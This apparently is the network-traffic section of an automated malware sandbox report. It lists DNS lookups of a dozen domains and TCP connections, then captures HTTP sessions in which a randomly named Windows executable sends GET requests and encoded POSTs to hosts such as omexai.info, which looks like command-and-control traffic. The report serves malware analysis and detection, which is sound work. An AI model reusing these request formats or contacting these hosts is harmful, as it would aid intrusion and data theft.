              Sep 22, 2024 17:58:13.855516911 CEST4974180192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:13.865108013 CEST4974180192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:13.870225906 CEST804974113.248.169.48192.168.2.11
              Sep 22, 2024 17:58:13.870243073 CEST804974113.248.169.48192.168.2.11
              Sep 22, 2024 17:58:14.347722054 CEST804974113.248.169.48192.168.2.11
              Sep 22, 2024 17:58:14.351818085 CEST4974180192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:15.377624035 CEST4974180192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:15.382668972 CEST804974113.248.169.48192.168.2.11
              Sep 22, 2024 17:58:16.400892019 CEST4974280192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:16.405814886 CEST804974213.248.169.48192.168.2.11
              Sep 22, 2024 17:58:16.411499023 CEST4974280192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:16.415445089 CEST4974280192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:16.420285940 CEST804974213.248.169.48192.168.2.11
              Sep 22, 2024 17:58:16.891163111 CEST804974213.248.169.48192.168.2.11
              Sep 22, 2024 17:58:16.891237020 CEST804974213.248.169.48192.168.2.11
              Sep 22, 2024 17:58:16.891379118 CEST4974280192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:16.939867020 CEST4974280192.168.2.1113.248.169.48
              Sep 22, 2024 17:58:16.944767952 CEST804974213.248.169.48192.168.2.11
              Sep 22, 2024 17:58:36.548209906 CEST4974780192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:36.553864956 CEST804974743.242.202.169192.168.2.11
              Sep 22, 2024 17:58:36.553936958 CEST4974780192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:36.573174953 CEST4974780192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:36.580130100 CEST804974743.242.202.169192.168.2.11
              Sep 22, 2024 17:58:37.445209026 CEST804974743.242.202.169192.168.2.11
              Sep 22, 2024 17:58:37.445270061 CEST804974743.242.202.169192.168.2.11
              Sep 22, 2024 17:58:37.445318937 CEST4974780192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:38.083468914 CEST4974780192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:39.099812984 CEST4974880192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:39.104955912 CEST804974843.242.202.169192.168.2.11
              Sep 22, 2024 17:58:39.105038881 CEST4974880192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:39.116216898 CEST4974880192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:39.121246099 CEST804974843.242.202.169192.168.2.11
              Sep 22, 2024 17:58:39.997381926 CEST804974843.242.202.169192.168.2.11
              Sep 22, 2024 17:58:39.997782946 CEST804974843.242.202.169192.168.2.11
              Sep 22, 2024 17:58:39.997885942 CEST4974880192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:40.627685070 CEST4974880192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:41.647501945 CEST4974980192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:41.658375025 CEST804974943.242.202.169192.168.2.11
              Sep 22, 2024 17:58:41.658497095 CEST4974980192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:41.670500994 CEST4974980192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:41.686521053 CEST804974943.242.202.169192.168.2.11
              Sep 22, 2024 17:58:41.688628912 CEST804974943.242.202.169192.168.2.11
              Sep 22, 2024 17:58:42.837322950 CEST804974943.242.202.169192.168.2.11
              Sep 22, 2024 17:58:42.837569952 CEST804974943.242.202.169192.168.2.11
              Sep 22, 2024 17:58:42.837635040 CEST4974980192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:43.174493074 CEST4974980192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:44.194458961 CEST4975080192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:44.228521109 CEST804975043.242.202.169192.168.2.11
              Sep 22, 2024 17:58:44.228645086 CEST4975080192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:44.237627029 CEST4975080192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:44.263957977 CEST804975043.242.202.169192.168.2.11
              Sep 22, 2024 17:58:45.222044945 CEST804975043.242.202.169192.168.2.11
              Sep 22, 2024 17:58:45.222065926 CEST804975043.242.202.169192.168.2.11
              Sep 22, 2024 17:58:45.222219944 CEST4975080192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:45.224858046 CEST4975080192.168.2.1143.242.202.169
              Sep 22, 2024 17:58:45.229715109 CEST804975043.242.202.169192.168.2.11
              Sep 22, 2024 17:58:50.697751045 CEST4975180192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:50.702970982 CEST8049751103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:50.703589916 CEST4975180192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:50.713645935 CEST4975180192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:50.718763113 CEST8049751103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:51.300920963 CEST8049751103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:51.301158905 CEST8049751103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:51.303631067 CEST4975180192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:52.221496105 CEST4975180192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:53.239665985 CEST4975280192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:53.247837067 CEST8049752103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:53.251599073 CEST4975280192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:53.263495922 CEST4975280192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:53.270535946 CEST8049752103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:54.017046928 CEST8049752103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:54.019234896 CEST8049752103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:54.019288063 CEST4975280192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:54.771502018 CEST4975280192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:55.787189007 CEST4975380192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:55.808758974 CEST8049753103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:55.808841944 CEST4975380192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:55.820688009 CEST4975380192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:55.833283901 CEST8049753103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:55.835647106 CEST8049753103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:56.516799927 CEST8049753103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:56.516855001 CEST8049753103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:56.516908884 CEST4975380192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:57.330992937 CEST4975380192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:58.349710941 CEST4975480192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:58.371871948 CEST8049754103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:58.371973038 CEST4975480192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:58.380326033 CEST4975480192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:58.394824028 CEST8049754103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:59.129720926 CEST8049754103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:59.133064032 CEST8049754103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:59.133080006 CEST8049754103.224.182.242192.168.2.11
              Sep 22, 2024 17:58:59.133280039 CEST4975480192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:59.135843039 CEST4975480192.168.2.11103.224.182.242
              Sep 22, 2024 17:58:59.156563044 CEST8049754103.224.182.242192.168.2.11
              Sep 22, 2024 17:59:04.245083094 CEST4975580192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:04.257199049 CEST804975585.159.66.93192.168.2.11
              Sep 22, 2024 17:59:04.257294893 CEST4975580192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:04.272751093 CEST4975580192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:04.298674107 CEST804975585.159.66.93192.168.2.11
              Sep 22, 2024 17:59:05.784024000 CEST4975580192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:05.799190044 CEST804975585.159.66.93192.168.2.11
              Sep 22, 2024 17:59:05.799258947 CEST4975580192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:06.802746058 CEST4975680192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:06.807805061 CEST804975685.159.66.93192.168.2.11
              Sep 22, 2024 17:59:06.808024883 CEST4975680192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:06.819392920 CEST4975680192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:06.824314117 CEST804975685.159.66.93192.168.2.11
              Sep 22, 2024 17:59:08.330847025 CEST4975680192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:08.336281061 CEST804975685.159.66.93192.168.2.11
              Sep 22, 2024 17:59:08.336340904 CEST4975680192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:09.349714994 CEST4975780192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:10.177030087 CEST804975785.159.66.93192.168.2.11
              Sep 22, 2024 17:59:10.177124023 CEST4975780192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:10.203685045 CEST4975780192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:10.208931923 CEST804975785.159.66.93192.168.2.11
              Sep 22, 2024 17:59:10.208971024 CEST804975785.159.66.93192.168.2.11
              Sep 22, 2024 17:59:11.705847025 CEST4975780192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:11.714111090 CEST804975785.159.66.93192.168.2.11
              Sep 22, 2024 17:59:11.714199066 CEST4975780192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:12.727533102 CEST4975880192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:12.743365049 CEST804975885.159.66.93192.168.2.11
              Sep 22, 2024 17:59:12.743551016 CEST4975880192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:12.751522064 CEST4975880192.168.2.1185.159.66.93
              Sep 22, 2024 17:59:12.757061958 CEST804975885.159.66.93192.168.2.11
              TimestampSource PortDest PortSource IPDest IP
              Sep 22, 2024 17:56:19.998014927 CEST5128453192.168.2.111.1.1.1
              Sep 22, 2024 17:56:20.008229017 CEST53512841.1.1.1192.168.2.11
              Sep 22, 2024 17:56:25.021806955 CEST6464253192.168.2.111.1.1.1
              Sep 22, 2024 17:56:25.041882038 CEST53646421.1.1.1192.168.2.11
              Sep 22, 2024 17:56:30.052248955 CEST5040153192.168.2.111.1.1.1
              Sep 22, 2024 17:56:30.535269022 CEST53504011.1.1.1192.168.2.11
              Sep 22, 2024 17:56:46.099878073 CEST5866053192.168.2.111.1.1.1
              Sep 22, 2024 17:56:46.127521038 CEST53586601.1.1.1192.168.2.11
              Sep 22, 2024 17:56:59.990592003 CEST6514153192.168.2.111.1.1.1
              Sep 22, 2024 17:57:00.759757042 CEST53651411.1.1.1192.168.2.11
              Sep 22, 2024 17:57:13.899143934 CEST5775953192.168.2.111.1.1.1
              Sep 22, 2024 17:57:14.167154074 CEST53577591.1.1.1192.168.2.11
              Sep 22, 2024 17:57:27.874874115 CEST6132253192.168.2.111.1.1.1
              Sep 22, 2024 17:57:27.943557978 CEST53613221.1.1.1192.168.2.11
              Sep 22, 2024 17:57:41.321939945 CEST6287753192.168.2.111.1.1.1
              Sep 22, 2024 17:57:42.035164118 CEST53628771.1.1.1192.168.2.11
              Sep 22, 2024 17:57:55.334671021 CEST5736853192.168.2.111.1.1.1
              Sep 22, 2024 17:57:55.356879950 CEST53573681.1.1.1192.168.2.11
              Sep 22, 2024 17:58:08.678061962 CEST5891353192.168.2.111.1.1.1
              Sep 22, 2024 17:58:08.747129917 CEST53589131.1.1.1192.168.2.11
              Sep 22, 2024 17:58:21.943464994 CEST6433753192.168.2.111.1.1.1
              Sep 22, 2024 17:58:35.757280111 CEST5751453192.168.2.111.1.1.1
              Sep 22, 2024 17:58:36.544368029 CEST53575141.1.1.1192.168.2.11
              Sep 22, 2024 17:58:50.242578983 CEST5215453192.168.2.111.1.1.1
              Sep 22, 2024 17:58:50.693475962 CEST53521541.1.1.1192.168.2.11
              Sep 22, 2024 17:59:04.148742914 CEST5656953192.168.2.111.1.1.1
              Sep 22, 2024 17:59:04.241645098 CEST53565691.1.1.1192.168.2.11
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Sep 22, 2024 17:56:19.998014927 CEST192.168.2.111.1.1.10x4ddcStandard query (0)www.woshop.onlineA (IP address)IN (0x0001)false
              Sep 22, 2024 17:56:25.021806955 CEST192.168.2.111.1.1.10xd11bStandard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false
              Sep 22, 2024 17:56:30.052248955 CEST192.168.2.111.1.1.10xa063Standard query (0)www.elsupertodo.netA (IP address)IN (0x0001)false
              Sep 22, 2024 17:56:46.099878073 CEST192.168.2.111.1.1.10xae6dStandard query (0)www.omexai.infoA (IP address)IN (0x0001)false
              Sep 22, 2024 17:56:59.990592003 CEST192.168.2.111.1.1.10xecc9Standard query (0)www.tekilla.wtfA (IP address)IN (0x0001)false
              Sep 22, 2024 17:57:13.899143934 CEST192.168.2.111.1.1.10xb7c0Standard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
              Sep 22, 2024 17:57:27.874874115 CEST192.168.2.111.1.1.10x29bdStandard query (0)www.languagemodel.proA (IP address)IN (0x0001)false
              Sep 22, 2024 17:57:41.321939945 CEST192.168.2.111.1.1.10x63a9Standard query (0)www.kexweb.topA (IP address)IN (0x0001)false
              Sep 22, 2024 17:57:55.334671021 CEST192.168.2.111.1.1.10x5845Standard query (0)www.jobworklanka.onlineA (IP address)IN (0x0001)false
              Sep 22, 2024 17:58:08.678061962 CEST192.168.2.111.1.1.10xc9afStandard query (0)www.dyme.techA (IP address)IN (0x0001)false
              Sep 22, 2024 17:58:21.943464994 CEST192.168.2.111.1.1.10xd76fStandard query (0)www.arlon-commerce.comA (IP address)IN (0x0001)false
              Sep 22, 2024 17:58:35.757280111 CEST192.168.2.111.1.1.10x30ccStandard query (0)www.mizuquan.topA (IP address)IN (0x0001)false
              Sep 22, 2024 17:58:50.242578983 CEST192.168.2.111.1.1.10xe554Standard query (0)www.nobartv6.websiteA (IP address)IN (0x0001)false
              Sep 22, 2024 17:59:04.148742914 CEST192.168.2.111.1.1.10x881eStandard query (0)www.sailnway.netA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Sep 22, 2024 17:56:20.008229017 CEST1.1.1.1192.168.2.110x4ddcName error (3)www.woshop.onlinenonenoneA (IP address)IN (0x0001)false
              Sep 22, 2024 17:56:25.041882038 CEST1.1.1.1192.168.2.110xd11bName error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false
              Sep 22, 2024 17:56:30.535269022 CEST1.1.1.1192.168.2.110xa063No error (0)www.elsupertodo.net148.72.152.174A (IP address)IN (0x0001)false
              Sep 22, 2024 17:56:46.127521038 CEST1.1.1.1192.168.2.110xae6dNo error (0)www.omexai.infoomexai.infoCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:56:46.127521038 CEST1.1.1.1192.168.2.110xae6dNo error (0)omexai.info3.33.130.190A (IP address)IN (0x0001)false
              Sep 22, 2024 17:56:46.127521038 CEST1.1.1.1192.168.2.110xae6dNo error (0)omexai.info15.197.148.33A (IP address)IN (0x0001)false
              Sep 22, 2024 17:57:00.759757042 CEST1.1.1.1192.168.2.110xecc9No error (0)www.tekilla.wtfredirect.3dns.boxCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:57:00.759757042 CEST1.1.1.1192.168.2.110xecc9No error (0)redirect.3dns.box172.191.244.62A (IP address)IN (0x0001)false
              Sep 22, 2024 17:57:14.167154074 CEST1.1.1.1192.168.2.110xb7c0No error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:57:14.167154074 CEST1.1.1.1192.168.2.110xb7c0No error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
              Sep 22, 2024 17:57:27.943557978 CEST1.1.1.1192.168.2.110x29bdNo error (0)www.languagemodel.prowebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:57:27.943557978 CEST1.1.1.1192.168.2.110x29bdNo error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
              Sep 22, 2024 17:57:42.035164118 CEST1.1.1.1192.168.2.110x63a9No error (0)www.kexweb.top63.250.47.40A (IP address)IN (0x0001)false
              Sep 22, 2024 17:57:55.356879950 CEST1.1.1.1192.168.2.110x5845No error (0)www.jobworklanka.onlinejobworklanka.onlineCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:57:55.356879950 CEST1.1.1.1192.168.2.110x5845No error (0)jobworklanka.online91.184.0.200A (IP address)IN (0x0001)false
              Sep 22, 2024 17:58:08.747129917 CEST1.1.1.1192.168.2.110xc9afNo error (0)www.dyme.tech13.248.169.48A (IP address)IN (0x0001)false
              Sep 22, 2024 17:58:08.747129917 CEST1.1.1.1192.168.2.110xc9afNo error (0)www.dyme.tech76.223.54.146A (IP address)IN (0x0001)false
              Sep 22, 2024 17:58:22.030469894 CEST1.1.1.1192.168.2.110xd76fNo error (0)www.arlon-commerce.comwhois-unverified.domainbox.akadns.netCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:58:36.544368029 CEST1.1.1.1192.168.2.110x30ccNo error (0)www.mizuquan.top43.242.202.169A (IP address)IN (0x0001)false
              Sep 22, 2024 17:58:50.693475962 CEST1.1.1.1192.168.2.110xe554No error (0)www.nobartv6.website103.224.182.242A (IP address)IN (0x0001)false
              Sep 22, 2024 17:59:04.241645098 CEST1.1.1.1192.168.2.110x881eNo error (0)www.sailnway.netredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:59:04.241645098 CEST1.1.1.1192.168.2.110x881eNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:59:04.241645098 CEST1.1.1.1192.168.2.110x881eNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
              • www.elsupertodo.net
              • www.omexai.info
              • www.tekilla.wtf
              • www.bola88site.one
              • www.languagemodel.pro
              • www.kexweb.top
              • www.jobworklanka.online
              • www.dyme.tech
              • www.mizuquan.top
              • www.nobartv6.website
              • www.sailnway.net
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.1149713148.72.152.174806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:56:30.553241968 CEST549OUTGET /2jit/?u2pl=VvmP2xFp&0th4S=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1WpEhaSmAJJkEOtzcvEOIT6TmSSM2632jWQ8= HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.elsupertodo.net
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:56:31.057605028 CEST532INHTTP/1.1 301 Moved Permanently
              Server: nginx
              Date: Sun, 22 Sep 2024 15:56:31 GMT
              Content-Type: text/html
              Content-Length: 162
              Connection: close
              Location: https://www.elsupertodo.net/2jit/?u2pl=VvmP2xFp&0th4S=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1WpEhaSmAJJkEOtzcvEOIT6TmSSM2632jWQ8=
              X-XSS-Protection: 1; mode=block
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.11497153.33.130.190806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:56:46.156332016 CEST806OUTPOST /7xi5/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.omexai.info
              Origin: http://www.omexai.info
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 202
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.omexai.info/7xi5/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 34 7a 6a 58 64 76 2f 76 48 4d 4c 6a 43 41 63 70 72 30 34 4f 35 6d 75 32 54 4f 35 41 4e 48 76 56 73 67 3d 3d
              Data Ascii: 0th4S=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe4zjXdv/vHMLjCAcpr04O5mu2TO5ANHvVsg==


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.11497163.33.130.190806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:56:48.700241089 CEST826OUTPOST /7xi5/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.omexai.info
              Origin: http://www.omexai.info
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 222
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.omexai.info/7xi5/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 51 6a 74 48 77 4a 37 36 75 63 70 6c 61 79 37 4a 33 78 47 55 77 4a 43 73 42 66 4c 78 43 74 2b 6d 2b 2f 2f 53 36 4a 79 43 59 55 61 44 7a 76 4e 58 54 48 78 2b 46 32 43 74 62 6f 53 38 53 30 33 65 63 70 37 34 72 71 6b 61 70 4d 69 56 77 52 76 63 6d 73 4f 6d 72 6f 57 47 55 5a 4b 6c 65 2b 47 47 55 72 79 37 79 63 35 65 5a 2b 48 49 61 6e 62 31 64 34 66 71 78 31 57 2b 51 66 65 55 50 72 38 52 76 37 42 4b 6d 4e 7a 37 58 78 5a 36 31 6d 30 48 6f 59 77 45 32 4b 63 33 69 54 2b 67 66 74 36 71 57 53 71 6c 77 30 2b 4a 31 4d 77 62 6f 55 3d
              Data Ascii: 0th4S=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ61m0HoYwE2Kc3iT+gft6qWSqlw0+J1MwboU=


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.11497173.33.130.190806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:56:51.932121992 CEST1839OUTPOST /7xi5/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.omexai.info
              Origin: http://www.omexai.info
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1234
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.omexai.info/7xi5/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 57 37 74 48 69 42 37 34 50 63 70 6d 61 79 37 41 58 78 46 55 77 4a 66 73 42 48 50 78 43 68 49 6d 34 7a 2f 54 5a 42 79 4b 4a 55 61 4e 44 76 4e 49 44 48 30 6a 31 32 79 74 62 35 56 38 54 45 33 65 63 70 37 34 70 43 6b 64 37 6f 69 47 67 52 6f 4b 57 73 43 69 72 70 44 47 55 42 30 6c 61 69 57 48 6c 4c 79 34 53 4d 35 66 73 69 48 45 61 6e 6a 79 64 34 48 71 78 49 49 2b 55 2b 6e 55 4d 32 62 52 6f 50 42 4f 48 49 30 6e 56 74 79 6b 54 75 51 54 62 6b 30 42 55 71 61 35 77 7a 39 7a 4e 35 4d 2f 52 61 72 6d 78 39 42 61 30 4e 7a 5a 34 6d 75 4f 50 70 76 69 6b 44 47 6c 56 37 62 7a 43 30 74 43 4b 32 69 6d 59 66 33 5a 5a 44 31 32 4e 45 2f 52 38 62 63 64 62 7a 65 72 46 6a 62 61 31 66 63 74 52 43 39 43 41 44 65 6b 4f 34 35 42 76 53 30 2f 2b 68 36 47 52 32 4a 6f 50 4a 77 67 32 75 41 45 42 47 37 4c 77 58 79 34 51 41 45 6d 32 51 76 55 58 79 67 41 59 67 76 2b 65 2f 71 70 76 56 45 78 32 57 39 [TRUNCATED]
